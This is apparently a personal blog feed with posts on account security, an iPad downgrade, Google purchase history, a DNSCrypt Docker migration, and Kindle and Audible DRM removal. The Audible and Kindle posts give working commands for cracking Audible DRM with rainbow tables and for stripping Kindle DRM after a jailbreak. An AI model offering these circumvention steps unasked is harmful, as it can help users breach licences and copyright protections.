Aren’t you anti-Google?</h3> <p>Despite all the flak that Google gets for privacy, their security team is pretty awesome. Your account is pretty much unhackable once you are enrolled into their Advanced Protection Program. The few security-sensitive places where I use it are:</p> <ol> <li>Domain Registration</li> <li>Email Management</li> <li>DNS Configuration</li> </ol> <p>Everywhere else, I use my actual domain (<code class="language-plaintext highlighter-rouge">captnemo.in</code>) to ensure nothing else routes over GMail. Using GMail for the above 3 ensures that I don’t have a circular dependency. If I were to lose my main email password, I can recover via multiple ways:</p> <ol> <li>Change DNS to another email provider.</li> <li>Reset password via migadu admin panel.</li> </ol> <p>Ensuring that either of these workflows do not rely on the same email account I’ve just lost access to is vital. Another alternative is to use a trusted-friend (ideally someone more paranoid than me) as a proxy for these emails, and use their domain for managing these 2 services. Might get around to it someday.</p> <p>My GMail recovery email is set to my main account, so it creates a circular dependency, but one that I actually want.</p> <h3 id="what-do-you-recommend-i-use">What do you recommend I use?</h3> <ul> <li><a href="https://bitwarden.com/">Bitwarden</a> for password management.</li> <li>2x<a href="https://amzn.to/2ZHMDZU">HyperFIDO Mini U2F</a> Keys configured for second factor <a href="https://www.dongleauth.com/">against as many accounts as possible</a>. U2F is not only safer, but much more convenient than TOTP/SMS based 2FA. For iPhone/USB-C users, see <a href="https://www.yubico.com/products/compare-yubikey-5-series/">the Yubico website</a>. If you don’t like to pay the USB-C tax, there are cheap <a href="https://www.aliexpress.com/item/4000077099764.html">USB-C to miniUSB</a> adapters that can work with the HyperFIDO key and fit on your keychain. 
If you aren’t convinced on why this is a good idea, see <a href="https://techsolidarity.org/resources/security_key_faq.htm">this guide</a>. The second key is just a backup key, and could be the primary key used by your spouse, friends or co-workers.</li> <li>A PIN configured on all your SIMs. Instructions for <a href="https://support.apple.com/en-us/HT201529">iPhone</a>, <a href="https://support.t-mobile.com/docs/DOC-41621">Android</a>.</li> <li>Full-Disk-Encryption on all your devices. Instructions for <a href="https://securityplanner.org/#/tool/windows-encryption">Windows</a>, <a href="https://securityplanner.org/#/tool/mac-encryption">Mac</a>, <a href="https://wiki.archlinux.org/index.php/Dm-crypt/Encrypting_an_entire_system">ArchLinux</a>, <a href="https://fedoraproject.org/wiki/Disk_Encryption_User_Guide">Fedora</a>, <a href="https://help.ubuntu.com/community/Full_Disk_Encryption_Howto_2019">Ubuntu</a>.</li> <li>Use randomly generated passwords everywhere. Trust your password manager on this.</li> <li><a href="https://faq.whatsapp.com/en/android/26000021">Setup a PIN on your WhatsApp</a>.</li> <li>If you own a lot of cryptocurrency, use a hardware wallet and put it in a bank safe. Have a backup one, in another safe. You can put the PIN for those in your password store. I haven’t researched enough to suggest you which wallet(s).</li> <li>Get a SIM without an Aadhaar, to make SIM-Jacking attacks harder (applies in India).</li> <li>Go through <a href="https://securityplanner.org/">securityplanner.org</a>, which gives you personalized recommendations customized for your risk profile. I agree with most of their recommendations<sup id="fnref:10" role="doc-noteref"><a href="#fn:10" class="footnote" rel="footnote">8</a></sup></li> <li>Signup for breach notifications against your email at <a href="https://haveibeenpwned.com/">https://haveibeenpwned.com/</a>.</li> <li>If you’d like to get off GMail, pay for <a href="https://www.fastmail.com/">FastMail</a>. 
Alternatively, if I know you in real-life, I’m happy to host your mail in my Migadu account. (Only works if you know me well enough to trust me)</li> </ul> <h3 id="why-are-you-so-paranoid">Why are you so paranoid?</h3> <p>I work in infosec. Breaking things comes naturally to me, and I plan for defense-in-depth. Plus, I’d be a terrible security person if I got hacked.</p> <h3 id="why-not-recommend-open-source-keys-instead">Why not recommend open source keys instead?</h3> <p>Availability is a pain point, especially if you aren’t in the US. Even getting my hands on a SoloKey was hard, despite backing it on KickStarter.</p> <ul> <li><a href="https://onlykey.io">OnlyKey</a> also makes some claims regarding open source, but I can’t find their schematics anywhere.</li> <li><a href="https://solokeys.com/">SoloKey</a> is great, and what I’d recommend, but <a href="https://github.com/solokeys/solo/issues/16">it doesn’t support OpenPGP yet</a>.</li> <li><a href="https://shop.nitrokey.com/shop/product/nitrokey-start-6">NitroKey Start</a> is <a href="https://news.ycombinator.com/item?id=21884930">apparently completely FOSS</a>, so you might wanna check that.</li> </ul> <p>The HyperFIDO keys are compliant to the U2F/FIDO standards, and I’ve not faced any issues while using them. They’re cheap and widely available. Unless you need GPG, go for it.</p> <hr /> <p><small>Thanks to Giridharan, Santosh, and Akshay for reviewing drafts of this and offering valuable suggestions. 
If you have any suggestions, happy to <a href="/contact/">hear them</a></small></p> <hr /> <p>[passforios]: https://mssun.github.io/passforios/ “Open Source, no-network, minimalist pass client for iOS” [okc]: https://www.openkeychain.org/ [pass]: https://passwordstore.org [tile]: https://www.thetileapp.com/en-us/ [slim]: https://www.thetileapp.com/en-us/store/tiles/slim “I have the older version of the Tile Slim” [ssh-u2f]: https://www.undeadly.org/cgi?action=article;sid=20191115064850 “Does it really count as 2FA if both your SSH and U2F is the same device?” [nitrokey-start]: https://shop.nitrokey.com/shop/product/nitrokey-start-6</p> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:3" role="doc-endnote"> <p>I moved away from Lastpass after Tavis Ormandy reported a RCE vulnerability on their browser extension. Their wikipedia page mentions 2 breaches, and 3 security incidents. It has never undergone a security audit (unlike bitwarden) and is not something I recommend anymore. <a href="#fnref:3" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:1" role="doc-endnote"> <p>The <a href="https://github.com/roddhjav/pass-tomb">pass-tomb</a> extension bypasses this limit and encrypts your filenames as well. <a href="#fnref:1" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:7" role="doc-endnote"> <p>I have <a href="https://git.captnemo.in/explore/repos">my own git server</a> configured as a fallback if it goes down. I ensure the same controls on my Git server as Gitea, and it runs in my living room. <a href="#fnref:7" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:8" role="doc-endnote"> <p>I lost my previous GPG key because my Yubikey stopped working <a href="#fnref:8" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:11" role="doc-endnote"> <p>The jury is still out on whether this counts as an “independent second factor”. 
<a href="#fnref:11" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:6" role="doc-endnote"> <p>The domain is stuck in a legal limbo, because of an <a href="https://our.in/mitsu-ceo-got-upset-with-the-nixi-proceedings/">ongoing case between my registrar and NIXI</a> (which runs the <code class="language-plaintext highlighter-rouge">.in</code> registry). If you have any suggestions/ideas, please <a href="/contact">reach out</a>. <a href="#fnref:6" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:5" role="doc-endnote"> <p>Namecheap announced <a href="https://www.namecheap.com/blog/protect-account-totp-2-factor/">U2F support</a> in April 2019, and while it was buggy at first, it has definitely improved. <a href="#fnref:5" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> <li id="fn:10" role="doc-endnote"> <p>The one major exception is lastpass, which I no longer recommend. <a href="#fnref:10" class="reversefootnote" role="doc-backlink">&#8617;</a></p> </li> </ol> </div> Downgrading my iPad 2 to iOS 8 2019-08-11T00:00:00+00:00 https://captnemo.in/blog/2019/08/11/ipad-downgrade-ios-6-8 <p><em>Update</em>: Apple is no longer signing iOS6 for the iPad 2, so this is no longer feasible.</p> <p>I own an iPad 2 (GSM), which is rarely used these days because it is too slow with the latest iOS 9 upgrades. It is an 8 year old device, but I can’t just install Linux on it and make it usable, which is what I do with most other devices.</p> <p>The next best thing was to downgrade the iOS version. The device is anyway un-supported at this point, so I might as well go there. 
Apple has restrictions on which iOS releases are installable at any point on any device, <del>but thankfully they are still signing iOS6 for my device for some legal reasons</del>.</p> <h2 id="steps">Steps:</h2> <ol> <li>Download the iOS firmware for your device from <a href="https://ipsw.me/#platform">https://ipsw.me/#platform</a></li> <li>Launch iTunes</li> <li>Option+Click on the Restore button in iTunes</li> <li>Select the file you just downloaded.</li> <li>Disable iCloud on the device</li> <li>Upgrade to iOS8</li> </ol> <p>This is possible as long as Apple is signing the IPSW for your device. The case of iOS6 being signed seems to be true for:</p> <ul> <li>iPhone 4S</li> <li>iPad 2</li> </ul> <h2 id="security-notes">Security Notes</h2> <p>Running an unsupported OS is not something I take lightly. Here’s a list of defensive measures I took to ensure that I’m not at risk while doing so:</p> <ol> <li>Try to keep the device always in Airplane mode.</li> <li>Keep sensitive data off the device. No photos/keychain sync for eg. Don’t enable Calendar/Contact/Media sync.</li> <li>Enable Restrictions on the device: <ul> <li>Restrict Safari to limited websites.</li> <li>Disable application installs.</li> <li>Disable iTunes store/iBooks store etc.</li> <li>Disable GPS/Bluetooth.</li> <li>Limit Background Refresh to very few trusted applications.</li> </ul> </li> <li>Limit number of applications (I only have Kybooks installed).</li> <li>Disable Javascript on Safari.</li> </ol> <p>If possible, I’d recommend using a separate Apple Account on the device.</p> Cleaning up Google Purchases 2019-06-01T00:00:00+00:00 https://captnemo.in/blog/2019/06/01/cleaning-google-purchases <p>The <a href="https://www.cnbc.com/2019/05/17/google-gmail-tracks-purchase-history-how-to-delete-it.html">Google Purchase History</a> feature has been doing rounds in the news recently. 
In case you missed it, go to <a href="https://myaccount.google.com/purchases">https://myaccount.google.com/purchases</a> right now and make sure you are logged in with your personal gmail account to see what all Google thinks you’ve bought.</p> <p>For me it lists purchases going as far back as 2013, which include:</p> <ol> <li>All of my Amazon Purchases (including Kindle and Audible)</li> <li>Flipkart/Snapdeal purchases</li> <li>Gifts I’ve bought for others on various platforms</li> <li>All my iCloud purchases</li> <li>Purchases on Steam</li> <li>BigBasket purchases</li> <li>Google Playstore purchases as well, of course</li> <li>And much, much more.</li> </ol> <p>For each of the purchases, it remembers the price, the taxes, as well as the delivery address used.</p> <p>While this isn’t shocking in the least, I was surprised, because as an Infosec professional, I’ve disabled all of Google’s invasive tracking features:</p> <ol> <li>All my Activity Controls are paused.</li> <li>Google Location history is disabled for my account.</li> <li>I have <a href="https://myaccount.google.com/shared-endorsements">Shared endorsements</a> turned off.</li> <li>Ad personalization is turned off.</li> <li>I used to run with the <a href="https://addons.mozilla.org/en-US/firefox/addon/protect-my-choices/">Protect my Choices</a> extension till a while back to avoid targeted advertising.</li> </ol> <p>Regardless, the Google purchases page had hundreds of results, going back half a decade. Google currently does not offer a way to delete collected purchases directly, or to pause this collection in any way. 
The only way is to find the emails that Google scanned, and delete them.</p> <p>I ended up deleting everything from the following email addresses:</p> <p>Note that deleting the email doesn’t seem to be sufficient either, you need to clear your Trash, and then wait for a while (almost 2 days for me) before the system refreshes. After 3 days of just deleting mails, I finally got this screen:</p> <p><img src="/img/google-purchases.png" alt="screenshot of google purchases dashboard showing &quot;You don't have any purchases&quot;" /></p> <p>Google seems to be picking up <em>all kinds of emails, including</em>:</p> <ol> <li>Invoices</li> <li>Shipment Confirmations / Updates</li> <li>Return confirmations</li> <li>Payment Confirmations</li> <li>Order Cancellations</li> <li>Payment Failures (gasp!)</li> </ol> <h2 id="warning-about-deletions">Warning about Deletions</h2> <p>I’ve already switched away from Amazon/Flipkart emails from my Gmail. But deleting invoices from your inbox isn’t always the best idea. 
Most websites will let you re-download invoices (Amazon/Flipkart do), but take care not to delete any necessary emails that you might need for warranty claims or any other purpose later.</p> Migrating DNSCrypt Server to Docker 2019-05-18T00:00:00+00:00 https://captnemo.in/blog/2019/05/18/dnscrypt-migrating-to-docker <p>I’ve been running a personal <a href="https://captnemo.in/dnscrypt/">DNSCrypt server in Bangalore</a> for the last 2 years. When I set it up, it was just a compiled version of <code class="language-plaintext highlighter-rouge">dnscrypt-wrapper</code>, which was the bare minimum setup I could do.</p> <p>Since then, I’ve upgraded it to a distribution supported version, but with recent changes in <a href="https://dnscrypt.pl/2017/01/04/keys-are-now-rotated-every-24-hours/">dnscrypt key rotation</a>, I’ve been wanting to set up something automated as well.</p> <p>The easiest way was to switch to the official <a href="https://github.com/DNSCrypt/dnscrypt-server-docker">DNSCrypt Docker</a> image, which does both key generation and certificate rotation. Since my public key was already present in the <a href="https://dnscrypt.info/public-servers">DNSCrypt Server lists</a>, I was not too keen to regenerate a new key.</p> <p>The primary challenge was ensuring that the docker container picks up my existing keys without trying to generate new ones from scratch. 
It was basically 2 steps:</p> <ol> <li>Match the directory structure that the container expects.</li> <li>Invoke the container directly into <code class="language-plaintext highlighter-rouge">start</code> mode while passing existing keys.</li> </ol> <h2 id="directory-structure">Directory Structure</h2> <p>I copied my keys (<code class="language-plaintext highlighter-rouge">public.key</code>, <code class="language-plaintext highlighter-rouge">secret.key</code>) to <code class="language-plaintext highlighter-rouge">/etc/dnscrypt-keys</code> and ran the following:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>echo 2.dnscrypt-cert.captnemo.in &gt; provider_name
touch provider_info.txt # I couldn't figure out how to output the same info, so kept it blank
hexdump -ve '1/1 "%.2x"' &lt; public.key &gt; public.key.txt
</code></pre></div></div> <p>Then I ensured that the file permissions are matching what the container expects:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>chmod 640 secret.key
chmod 644 public.key
chown root:1002 public.key secret.key
chmod 644 provider_name
</code></pre></div></div> <p>This is how the final permissions looked for the directory (<code class="language-plaintext highlighter-rouge">/etc/dnscrypt-keys</code>)</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-rw-r----- 1 root 1002 64 May 18 07:15 secret.key
-rw-r--r-- 1 root 1002 32 May 18 07:15 public.key
-rw-r--r-- 1 root root 28 May 18 07:19 provider_name
-rw-r--r-- 1 root root 0 May 18 07:23 provider_info.txt
-rw-r--r-- 1 root root 64 May 18 07:25 public.key.txt
drwxr-xr-x 2 root root 4096 May 18 07:26 .
</code></pre></div></div> <h2 id="running-the-container">Running the Container</h2> <p>Then, I directly ran the <code class="language-plaintext highlighter-rouge">dnscrypt-wrapper</code> container:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker run --detach \
    --restart=unless-stopped \
    --volume /etc/dnscrypt-keys:/opt/dnscrypt-wrapper/etc/keys \
    --publish 10.47.0.5:4434:443/tcp \
    --publish 10.47.0.5:4434:443/udp \
    jedisct1/dnscrypt-server start
</code></pre></div></div> <p>I pass a host path mount instead of creating a Docker Volume, since they can get deleted in regular <code class="language-plaintext highlighter-rouge">docker prune</code>.</p> <p>Here, <code class="language-plaintext highlighter-rouge">10.47.0.5</code> is the <a href="https://www.digitalocean.com/docs/networking/floating-ips/how-to/find-anchor-ips/">“Anchor IP”</a>, which Digital Ocean internally maps to my <a href="https://www.digitalocean.com/docs/networking/floating-ips/">Floating IP</a>.</p> <p>The container comes up, generates new short-term keys and goes live:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Starting DNSCrypt service for provider: 2.dnscrypt-cert.captnemo.in
Starting pre-service scripts in /etc/runit_init.d
setup in directory /opt/unbound/etc/unbound
generating unbound_server.key
Generating RSA private key, 3072 bit long modulus (2 primes)
.......++++
...................++++
e is 65537 (0x010001)
generating unbound_control.key
Generating RSA private key, 3072 bit long modulus (2 primes)
.........................++++
........................................++++
e is 65537 (0x010001)
create unbound_server.pem (self signed certificate)
create unbound_control.pem (signed client certificate)
Signature ok
subject=CN = unbound-control
Getting CA Private Key
Setup success. Certificates created. Enable in unbound.conf file to use
ok: run: unbound: (pid 28) 300s
ok: run: dnscrypt-wrapper: (pid 31) 300s
ok: run: unbound: (pid 28) 600s
ok: run: dnscrypt-wrapper: (pid 31) 600s
</code></pre></div></div> <p>Once the server was up, I verified connectivity with <code class="language-plaintext highlighter-rouge">dnscrypt-proxy</code> and it worked perfectly.</p> <h2 id="future-scope">Future Scope</h2> <p>Right now, I have a single container that does 2 things:</p> <ol> <li><a href="https://github.com/DNSCrypt/dnscrypt-server-docker/blob/1f42134a69ade6026f07c463f6a497ae12cff3f4/key-rotation.sh#L3">Certificate Rotation</a> via a service that checks it every 30 minutes.</li> <li>DNSCrypt Service, which is accessible over the internet.</li> </ol> <p>For (1) to work, it needs access to the Private Keys that are used to sign the temporary certificates that last 24 hours. Since both things are managed within the same container, the container ends up with both network <em>and</em> long-term keys access. This means, any RCE on the service can result in the long-term keys being compromised.</p> <p>A simple fix for this would be to separate out the Certificate Rotation part into a separate “mode” on the Docker Image, which can be called independently. This would allow someone to run certificate rotation on a second container using a scheduler, but with far more limitations (such as no network access). 
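The exposure described in this section (one container holding both a network and the long-term key) can be checked mechanically from `docker inspect` output. The following is an added example, not code from the post or from the DNSCrypt project; both JSON samples are constructed, and the container names, the `dnscrypt-rotate` container and the `/etc/dnscrypt-short-term` directory are hypothetical stand-ins for the proposed split.

```python
"""Flag containers that combine network access with the long-term DNSCrypt key.

Input is the JSON array printed by `docker inspect <container> ...`.
"""
import json
from pathlib import PurePosixPath

# Host path of the long-term provider secret key, as used in the post.
LONG_TERM_SECRET = PurePosixPath("/etc/dnscrypt-keys/secret.key")


def mount_exposes(source, secret=LONG_TERM_SECRET):
    """True if mounting host path `source` makes `secret` visible inside."""
    src = PurePosixPath(source)
    # Mounting the file itself, its directory, or any ancestor exposes it;
    # a sibling directory or a sub-directory beside the key does not.
    return src.is_absolute() and (src == secret or src in secret.parents)


def audit(inspect_json, secret=LONG_TERM_SECRET):
    """Return one finding per container that has both a network and the key."""
    findings = []
    for container in json.loads(inspect_json):
        host_cfg = container.get("HostConfig") or {}
        # "none" leaves the container with a loopback interface only.
        mode = host_cfg.get("NetworkMode") or "default"
        bindings = host_cfg.get("PortBindings") or {}
        exposing = [m for m in container.get("Mounts") or []
                    if mount_exposes(m.get("Source", ""), secret)]
        if mode == "none" or not exposing:
            continue
        findings.append({
            "container": container.get("Name", "").lstrip("/"),
            "network_mode": mode,
            "published": sorted(p for p, b in bindings.items() if b),
            "mounts": [m["Source"] for m in exposing],
            "writable": any(m.get("RW", False) for m in exposing),
        })
    return findings


# Constructed sample: the single container started by the `docker run` above.
CURRENT_SETUP = json.dumps([{
    "Name": "/dnscrypt",
    "HostConfig": {
        "NetworkMode": "default",
        "PortBindings": {
            "443/tcp": [{"HostIp": "10.47.0.5", "HostPort": "4434"}],
            "443/udp": [{"HostIp": "10.47.0.5", "HostPort": "4434"}],
        },
    },
    "Mounts": [{"Type": "bind", "Source": "/etc/dnscrypt-keys",
                "Destination": "/opt/dnscrypt-wrapper/etc/keys", "RW": True}],
}])

# Constructed sample of the proposed split (hypothetical names and paths):
# the service sees only short-term material, the rotator has no network.
SPLIT_SETUP = json.dumps([
    {
        "Name": "/dnscrypt",
        "HostConfig": {
            "NetworkMode": "default",
            "PortBindings": {
                "443/tcp": [{"HostIp": "10.47.0.5", "HostPort": "4434"}],
                "443/udp": [{"HostIp": "10.47.0.5", "HostPort": "4434"}],
            },
        },
        "Mounts": [{"Type": "bind", "Source": "/etc/dnscrypt-short-term",
                    "Destination": "/short-term", "RW": False}],
    },
    {
        "Name": "/dnscrypt-rotate",
        "HostConfig": {"NetworkMode": "none", "PortBindings": {}},
        "Mounts": [
            {"Type": "bind", "Source": "/etc/dnscrypt-keys",
             "Destination": "/long-term", "RW": False},
            {"Type": "bind", "Source": "/etc/dnscrypt-short-term",
             "Destination": "/short-term", "RW": True},
        ],
    },
])

if __name__ == "__main__":
    for label, sample in (("current", CURRENT_SETUP), ("split", SPLIT_SETUP)):
        print(label, json.dumps(audit(sample), indent=2))
```

On a real host the input would come from `docker inspect $(docker ps -q)`; a mount of a parent directory such as `/etc` is flagged as well, since it exposes the key just the same.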
A common file-mount between both the containers can take care of sharing the temporary keys between the containers, and a simple unix socket on the shared-file-mount can be used to signal a certificate rotation (this triggers the dnscrypt service restart, so it picks the new cert).</p> Stripping Audible DRM 2019-04-14T00:00:00+00:00 https://captnemo.in/blog/2019/04/14/audible-drm <p>Self-Guide for stripping the Audible DRM, in similar vein as my <a href="/blog/2019/03/26/kindle-self-guide/">Kindle Self-Guide</a>.</p> <ol> <li>Download the aax file from Audible website.</li> <li>Run the inAudible-NG Rainbow crack table against the AAX file.</li> </ol> <p>Easiest way is via docker/podman:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cd ~/Music/Audiobooks
podman run -v "$(pwd)":/data ryanfb/inaudible@sha256:b66738d235be1007797e3a0a0ead115fa227e81e2ab5b7befb97d43f7712fac5
# the glob must stay unquoted so that it expands to the individual files
for i in *.m4a; do fix-audible-m4a "$i"; done
</code></pre></div></div> <p>The cool part about this is that the entire activation is done offline, and runs a Rainbow Table attack against the Audible DRM. To make the process faster in the future, you can save your “activation bytes” (8 hex characters) and directly use them with ffmpeg to decode instead:</p> <p><code class="language-plaintext highlighter-rouge">ffmpeg -loglevel panic -y -activation_bytes ${AUDIBLE_ACTIVATION_BYTES} -i "$aax_file" -c:a copy -vn "$m4a_file"</code></p> <p>A small percentage of Audible AAX files have an incorrect bit set in the “Audio Object Type Specific Config” in the ESDS atom in an M4A file, which leads to them not playing in Firefox/Android and some other players. 
To fix this, I have a <a href="https://github.com/captn3m0/Scripts/blob/master/fix-audible-m4a">fix-audible-m4a</a> script called above.</p> <h2 id="references">References</h2> <ul> <li><a href="https://github.com/ryanfb/docker_inaudible_rainbowcrack">https://github.com/ryanfb/docker_inaudible_rainbowcrack</a></li> <li><a href="https://github.com/inAudible-NG/tables">https://github.com/inAudible-NG/tables</a></li> <li><a href="https://rentry.co/n4ost">https://rentry.co/n4ost</a></li> </ul> Kindle Hacks, A Self-guide 2019-03-26T00:00:00+00:00 https://captnemo.in/blog/2019/03/26/kindle-self-guide <p>I run a non-standard Kindle configuration:</p> <ol> <li>Jailbroken <small>(because I want to own the device, not rent it)</small></li> <li>Runs KOReader <small>(because I want to read EPUBs and PDFs with reflow.)</small></li> <li>DRM Stripping <small>(because I want to own the book, not rent it)</small></li> </ol> <p>Since I don’t do any of these often enough to automate it, this is a self guide to help me follow these steps the next time I have to do any of this. No guarantees of this being helpful to anyone else but me.</p> <h1 id="jailbreak">Jailbreak</h1> <p>The <a href="https://lifehacker.com/how-to-jailbreak-your-kindle-1783864074" title="Lifehacker's Guide on how to Jailbreak a Kindle">lifehacker guide on how to jailbreak your kindle</a> is a good starting point [<a href="https://outline.com/cEZNAt">archived</a>]. The mobileread forums have the <a href="https://www.mobileread.com/forums/showthread.php?t=275881">definitive guides</a>. Also see <a href="https://wiki.mobileread.com/wiki/5_x_Jailbreak#Will_this_jail_break_work_on_my_current_firmware.3F">this FAQ</a> on the mobileread wiki.</p> <p>(Most of these only cover modern paperwhite kindles)</p> <h2 id="maintaining-the-jailbreak">Maintaining the Jailbreak</h2> <p>Sometimes, Kindle firmware updates will stop the Jailbreak. Search for your firmware on mobileread forums. 
See <a href="https://www.mobileread.com/forums/showthread.php?p=3562050">this link</a> for the 5.8 series.</p> <p>Copy the <code class="language-plaintext highlighter-rouge">.bin</code> file to your kindle root directory and trigger a manual firmware update. That should reboot and re-affirm the jailbreak. To trigger a manual firmware update, go to the Kindle Menu and click “Update”. If it is greyed out, check if the file was copied correctly, and try rebooting.</p> <h1 id="applications">Applications</h1> <p>Once you have a jailbreak, the rest is mostly installing packages via MRPI. I keep a ready directory of packages I can copy as-is to my Kindle. The current listing is at <a href="https://paste.ubuntu.com/p/CXS5hYZdqc/">https://paste.ubuntu.com/p/CXS5hYZdqc/</a> with most of it just being koreader.</p> <p><a href="https://koreader.rocks">koreader</a> is a FOSS document viewer for E Ink devices that supports Kindle, Kobo, PocketBook, Ubuntu Touch and Android devices.</p> <p>The primary 2 packages are:</p> <ul> <li><code class="language-plaintext highlighter-rouge">Update_KUALBooklet_v2.7_install.bin</code></li> <li><code class="language-plaintext highlighter-rouge">update_kpvbooklet_0.6.6_install.bin</code></li> </ul> <p>Run <code class="language-plaintext highlighter-rouge">;log mrpi</code> via search after copying them to re-install them if needed.</p> <h2 id="koreader">koreader</h2> <p>Download the latest release from <a href="https://github.com/koreader/koreader/releases/latest">GitHub</a>.</p> <p>You should download the <code class="language-plaintext highlighter-rouge">kindle5-linux-gnueabi</code> package for modern Paperwhites. Unzip it to the copy directory mentioned above.</p> <p>Aside: koreader has a linux appimage version for desktops, which <a href="https://aur.archlinux.org/packages/koreader-appimage/">I package for AUR</a>.</p> <h1 id="drm-related-stuff">DRM Related Stuff</h1> <p>DRM is inherently bad for users. 
If I switch my Ebook reader from Kindle (which are great <em>as of today</em>) to a Kobo tomorrow, I want my content to stay with me.</p> <p>There are much better websites that explain the issues with DRM, so go visit: <a href="https://fckdrm.com/">fckdrm.com</a>, <a href="https://www.defectivebydesign.org">DefectiveByDesign.org</a>, or <a href="https://www.eff.org/issues/drm">EFF/drm</a>.</p> <p>The primary tool for stripping DRM from Kindle books is <a href="https://github.com/apprenticeharper/DeDRM_tools">apprenticeharper’s DeDRM Repo</a> which works as a <a href="https://calibre-ebook.com/">Calibre Plugin</a>. If you are running calibre with Python 3 (such as via the <a href="https://www.archlinux.org/packages/community/x86_64/calibre-python3/">calibre-python3</a> package on Arch Linux) - you should install the DeDRM plugin from the <a href="https://github.com/lalmeras/DeDRM_tools/tree/Python3/DeDRM_plugin">python3 fork</a>. Compress the <code class="language-plaintext highlighter-rouge">DeDRM_plugin</code> directory into a flat-zip file and use that in Calibre.</p> <h2 id="getting-the-key">Getting the Key</h2> <p>My current key is saved in pass:</p> <p><code class="language-plaintext highlighter-rouge">pass show Keys/Kindle.k4i |jq</code></p> <p>Save it in a file, which you can import to Calibre.</p> <p>If you don’t have the key or if the above isn’t valid, see <a href="https://www.reddit.com/r/ebooks/comments/2muccd/remove_drm_restrictions_from_almost_any_type_of/cm8f5gt/">this comment on r/ebooks</a> [<a href="https://web.archive.org/web/20190326171740/https://www.reddit.com/r/ebooks/comments/2muccd/remove_drm_restrictions_from_almost_any_type_of/cm8f5gt/">archived</a>].</p> <h2 id="importing-the-key">Importing the Key</h2> <blockquote> <p>At the bottom-left of the plugin’s customization dialog, you will see a button labeled “Import Existing Keyfiles”. Use this button to import existing ‘.k4i’ key files. 
Key files might come from being exported from this plugin, or may have been generated using the kindlekey.pyw script running under Wine on Linux systems.</p> </blockquote>
<p>I once did some trickery on the <code class="language-plaintext highlighter-rouge">kindlekey.pyw</code> application to get it working on my system, but I didn’t take notes. If I ever do this again - AUTOMATE THIS.</p>
<h2 id="getting-a-copy-of-the-encrypted-book">Getting a copy of the encrypted book</h2>
<p>There are multiple sources for you to try.</p>
<ol> <li>Amazon website’s My Content page is the easiest. It doesn’t work for books with special typesetting - quite rare. Prefer this over everything else.</li> <li>Download via the Kindle for PC application (See next section).</li> <li>Get the KFX file from your Kindle device.</li> <li>Copy the KFX/AZW file from the Android/iOS application.</li> </ol>
<h3 id="kindle-for-pc">Kindle for PC</h3>
<p>Stripping DRM for any medium is always a cat-and-mouse game. Amazon keeps changing the DRM format in every Kindle firmware update, which is why the recommended method is to use a known/older version of the Kindle for Mac/PC Application as your source.</p>
<p><em>Note</em>: The 1.24.3 release does not work on Linux. If you’re on Linux, you must download the <a href="https://filehippo.com/download_kindle_for_pc/download/a6284b51053b0e38f4b9f90d4470bd91/">1.17.0</a> release instead (<code class="language-plaintext highlighter-rouge">sha256=14e0f0053f1276c0c7c446892dc170344f707fbfe99b6951762c120144163200</code>).</p>
<ol> <li>Install Kindle for PC. It does work on Wine. Make sure you download <code class="language-plaintext highlighter-rouge">1.24.3 (51068)</code>. I trust <a href="https://filehippo.com/download_kindle_for_pc/download/ef9369348002466588fd3316af6e00fb/">filehippo</a> for this.
The sha256sum for the installer is <code class="language-plaintext highlighter-rouge">c7a1a93763d102bca0fed9c16799789ae18c3322b1b3bdfbe8c00422c32f83d7</code>.</li> <li>Install then launch it, and download the book.</li> <li>Go to <code class="language-plaintext highlighter-rouge">~/Documents/My Kindle Content</code></li> <li>Find book by Last Modified Date.</li> <li>Run <code class="language-plaintext highlighter-rouge">calibredb add book.azw</code>. If all goes well, the book should show up in your library, and you should be able to convert it.</li> </ol>
<hr />
<h1 id="reference-files">Reference Files</h1>
<p>I have a backup of my current Kindle files at http://ge.tt/75zk4Dv2 in case you need any of the files mentioned above. Checksums for the files are below, since <code class="language-plaintext highlighter-rouge">ge.tt</code> doesn’t believe in HTTPS:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>e3b05193ed9d0b482f01dfb550eba67f3b113b5165aae5632379cf35fec2f59d  copy.tar.gz
14e0f0053f1276c0c7c446892dc170344f707fbfe99b6951762c120144163200  KindleForPC-installer-1.17.44170.exe
c7a1a93763d102bca0fed9c16799789ae18c3322b1b3bdfbe8c00422c32f83d7  KindleForPC-installer-1.24.51068.exe
50bb0e5d9c03bcb79b17c1b7063cefd2c947a9d1c4392814e6ec05225296472a  kual-helper-0.5.N.zip
39352b4b68993680f06d5ecc57ce7ec4c271b6b5f2386ea998027420c45f2acd  KUAL-KDK-1.0.azw2
ceb207ee4c8d3674f308ff91432aeabf213b203571e270f70b8ae218df6ded7d  KUAL-KDK-2.0.azw2
fce02f0e104e846f1e4cc0e029500c5a722614d63a47035d78ea4cf59f67a448  kual-mrinstaller-1.6.N.zip
4a6de1fafe47ec0e3bfb529edead401c92e66b00697d507abe945679b3b7bc65  KUAL-v2.7.zip
253d0b00b31d62ef9dadb7ca88b98e2718cb35246816b3c50dd63c0a7ef28a52  Update_jailbreak_hotfix_1.14_5.8.10_install.bin
cc63ba1b454d1f32492c835f108ee04aaa80e6e7a95f12b7216c2c015daa2fbc  Update_jailbreak_hotfix_1.14_nomax_install.bin
</code></pre></div></div>
Dealing with dead disks in a btrfs RAID1 array
2019-02-24T00:00:00+00:00 https://captnemo.in/blog/2019/02/24/btrfs-raid-device-replacement-story
